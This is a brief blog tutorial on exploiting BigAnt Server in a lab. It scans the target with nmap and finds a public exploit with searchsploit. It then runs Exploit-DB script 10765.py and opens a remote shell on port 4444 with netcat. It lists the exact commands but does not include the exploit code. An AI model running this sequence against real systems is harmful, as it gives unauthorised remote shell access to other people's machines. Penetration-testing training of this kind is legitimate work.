Search Exploit from Exploit DB Repository

Posted by shinigami at 02:00 Read our previous post

In this case, I will using exploit from Exploit-DB Repository.
We need to search information about the target. I'm using Nmap to do that.

root@bt# nmap -p20-7000 172.16.227.130

-p options from nmap is used for scanning open port on target, the range is 20 until 7000. You can modify the range.
Results of this action is :

From the images above, you can see that we get two unknown port (6660 and 6661). To know about this ports, we need to search on google with keyword "application with port 6660 6661". The result is "BigAnt Server", next I will search exploit for BigAnt using exploit-db repository.

How to use ....
simply by running this command:
/pentest/exploits/exploitdb/searchsploit [keyword] [platform] [type[remote|local]]

root@bt# /pentest/exploits/exploitdb/searchsploit bigant windows remote

Many exploit for Big Ant, we need to try one-by-one. I will try using this exploit

BigAnt Server 2.52 SEH (0day) /windows/remote/10765.py

To use this exploit, we can read the script using text edior. For example kwrite.

kwrite /pentest/exploits/exploitdb/platforms/windows/remote/10765.py

Okay, you got it? I got it :D

#root@BT4VM:~# ./bigant.py 192.168.87.130
#Exploit sent! Connect to remote host on port 4444
#
#root@BT4VM:~# nc -vn 192.168.87.130 4444

Now, run the command:

root@bt# python /pentest/exploits/exploitdb/platforms/windows/remote/10765.py 172.16.227.130

Next, connect to the target using NetCat

root@bt# nc -v 172.16.227.130 4444

Done.